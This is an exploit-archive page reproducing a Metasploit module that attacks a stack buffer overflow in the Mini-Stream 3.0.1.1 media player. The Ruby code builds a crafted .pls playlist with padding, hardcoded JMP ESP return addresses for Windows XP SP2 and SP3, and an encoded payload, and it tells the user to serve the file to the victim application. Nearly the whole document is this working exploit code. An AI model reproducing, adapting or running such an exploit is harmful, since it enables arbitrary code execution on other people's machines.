[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mini-Stream 3.0.1.1 Buffer Overflow Exploit (Meta)
# Published : 2009-12-27
# Author : Ron Henry and dijital1
# Previous Title : Mini-Stream Exploit for Windows XP SP2 and SP3
# Next Title : ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit',
'Description' => %q{
This module exploits a stack overflow in Mini-Stream 3.0.1.1
By creating a specially crafted pls file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Corlan Security Team ',
'Ron Henry - <rlh [at] ciphermonk.net> - EIP Offset fix',
'dijital1',
],
'Version' => '$Revision: 7828 $',
'References' =>
[
[ 'OSVDB', '' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10745' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 3500,
'BadChars' => "x00x3ax26x3fx25x23x20x0ax0dx2fx2bx0bx5cx26x3dx2bx3fx3ax3bx2dx2cx2fx23x2ex5cx30",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 - English', { 'Ret' => 0x7e429353} ], # 0x7e429353 JMP ESP - USER32.dll
[ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll
],
'Privileged' => false,
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.pls']),
], self.class)
end
def exploit
sploit = rand_text_alphanumeric(17403)
sploit << [target.ret].pack('V')
sploit << "CAFE" * 8
sploit << payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
print_status("Copy .pls to webserver and pass the URL to the application")
end
end